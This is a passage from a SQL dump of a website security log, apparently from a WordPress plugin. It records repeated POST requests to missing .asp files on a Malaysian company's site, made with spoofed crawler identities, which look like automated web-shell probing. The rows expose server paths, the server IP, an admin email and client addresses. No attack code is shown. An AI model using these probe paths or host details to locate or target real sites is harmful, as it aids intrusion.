ebmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG2ze0MT698oQwhBK9epAAAARA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927757.1254\";s:12:\"REQUEST_TIME\";s:10:\"1571927757\";}}','notice','2019-10-24 14:35:59','2019-10-24 14:35:57',35343008,37145960,'http://bintara.com.my//kuw/confings.asp',1,0,'121.55.52.169'),(28951,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//productlist/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"59.53.211.143\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"59.53.211.143\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/productlist/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/productlist/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG2ou0MT698oQwhBK9ekQAAARI\";s:12:\"REDIRECT_URL\";s:22:\"/productlist/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54967\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/productlist/index.asp\";s:10:\"SCRIPT_URL\";s:22:\"/productlist/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG2ou0MT698oQwhBK9ekQAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927715.0603\";s:12:\"REQUEST_TIME\";s:10:\"1571927715\";}}','notice','2019-10-24 14:35:16','2019-10-24 14:35:15',35265256,37074120,'http://bintara.com.my//productlist/index.asp',1,0,'59.53.211.143'),(28950,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//productlist/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"210.12.199.228\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"210.12.199.228\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/productlist/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/productlist/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG2nO0MT698oQwhBK9ejgAAAQs\";s:12:\"REDIRECT_URL\";s:22:\"/productlist/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54967\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/productlist/index.asp\";s:10:\"SCRIPT_URL\";s:22:\"/productlist/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG2nO0MT698oQwhBK9ejgAAAQs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927708.8543\";s:12:\"REQUEST_TIME\";s:10:\"1571927708\";}}','notice','2019-10-24 14:35:12','2019-10-24 14:35:09',35732648,37529880,'http://bintara.com.my//productlist/index.asp',1,0,'210.12.199.228'),(28949,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//images/cache.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"687\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"202.136.209.46\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"202.136.209.46\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/images/cache.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/images/cache.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG2j92Cd74l7secq5lyQAAAAUs\";s:12:\"REDIRECT_URL\";s:17:\"/images/cache.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54659\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/images/cache.asp\";s:10:\"SCRIPT_URL\";s:17:\"/images/cache.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG2j92Cd74l7secq5lyQAAAAUs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927696.0679\";s:12:\"REQUEST_TIME\";s:10:\"1571927696\";}}','notice','2019-10-24 14:34:57','2019-10-24 14:34:56',35268192,37069544,'http://bintara.com.my//images/cache.asp',1,0,'202.136.209.46'),(28948,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//c_news/cache.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"687\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"125.72.135.5\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"125.72.135.5\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/c_news/cache.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/c_news/cache.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG2eu0MT698oQwhBK9eggAAAQg\";s:12:\"REDIRECT_URL\";s:17:\"/c_news/cache.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54130\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/c_news/cache.asp\";s:10:\"SCRIPT_URL\";s:17:\"/c_news/cache.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG2eu0MT698oQwhBK9eggAAAQg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927674.6311\";s:12:\"REQUEST_TIME\";s:10:\"1571927674\";}}','notice','2019-10-24 14:34:36','2019-10-24 14:34:35',35268824,37071200,'http://bintara.com.my//c_news/cache.asp',1,0,'125.72.135.5'),(28947,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//c_news/cache.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"822\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"58.25.133.24\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"58.25.133.24\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/c_news/cache.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/c_news/cache.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG2ZUq-QPicCh3WFsYe4gAAAIo\";s:12:\"REDIRECT_URL\";s:17:\"/c_news/cache.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53622\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/c_news/cache.asp\";s:10:\"SCRIPT_URL\";s:17:\"/c_news/cache.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG2ZUq-QPicCh3WFsYe4gAAAIo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927653.5284\";s:12:\"REQUEST_TIME\";s:10:\"1571927653\";}}','notice','2019-10-24 14:34:15','2019-10-24 14:34:14',35341424,37148864,'http://bintara.com.my//c_news/cache.asp',1,0,'58.25.133.24'),(28946,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//document/address.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"683\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"121.41.214.220\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"121.41.214.220\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/document/address.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/document/address.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG2U-5cHc@dX2BdZ47E0AAAAAo\";s:12:\"REDIRECT_URL\";s:21:\"/document/address.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52844\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/document/address.asp\";s:10:\"SCRIPT_URL\";s:21:\"/document/address.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG2U-5cHc@dX2BdZ47E0AAAAAo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927635.2332\";s:12:\"REQUEST_TIME\";s:10:\"1571927635\";}}','notice','2019-10-24 14:33:57','2019-10-24 14:33:55',35269280,37069664,'http://bintara.com.my//document/address.asp',1,0,'121.41.214.220'),(28945,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//document/address.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"116.112.72.222\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"116.112.72.222\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/document/address.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/document/address.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG2Tf5cHc@dX2BdZ47EzAAAAA4\";s:12:\"REDIRECT_URL\";s:21:\"/document/address.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52844\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/document/address.asp\";s:10:\"SCRIPT_URL\";s:21:\"/document/address.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG2Tf5cHc@dX2BdZ47EzAAAAA4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927629.8393\";s:12:\"REQUEST_TIME\";s:10:\"1571927629\";}}','notice','2019-10-24 14:33:51','2019-10-24 14:33:50',35338712,37136888,'http://bintara.com.my//document/address.asp',1,0,'116.112.72.222'),(28944,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"//images/Album/Thumb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"210.51.228.29\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"210.51.228.29\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"http://bintara.com.my/images/Album/Thumb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/images/Album/Thumb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG2K6HtjB8Y0WvpqtvJYQAAAMk\";s:12:\"REDIRECT_URL\";s:23:\"/images/Album/Thumb.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52359\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"http://bintara.com.my/images/Album/Thumb.asp\";s:10:\"SCRIPT_URL\";s:23:\"/images/Album/Thumb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG2K6HtjB8Y0WvpqtvJYQAAAMk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927595.7935\";s:12:\"REQUEST_TIME\";s:10:\"1571927595\";}}','notice','2019-10-24 14:33:17','2019-10-24 14:33:16',35269520,37076696,'http://bintara.com.my//images/Album/Thumb.asp',1,0,'210.51.228.29'),(28943,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"//images/Album/Thumb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"218.202.251.91\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"218.202.251.91\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"http://bintara.com.my/images/Album/Thumb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/images/Album/Thumb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG2H92Cd74l7secq5lyBgAAAU8\";s:12:\"REDIRECT_URL\";s:23:\"/images/Album/Thumb.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52004\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"http://bintara.com.my/images/Album/Thumb.asp\";s:10:\"SCRIPT_URL\";s:23:\"/images/Album/Thumb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG2H92Cd74l7secq5lyBgAAAU8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927583.7063\";s:12:\"REQUEST_TIME\";s:10:\"1571927583\";}}','notice','2019-10-24 14:33:05','2019-10-24 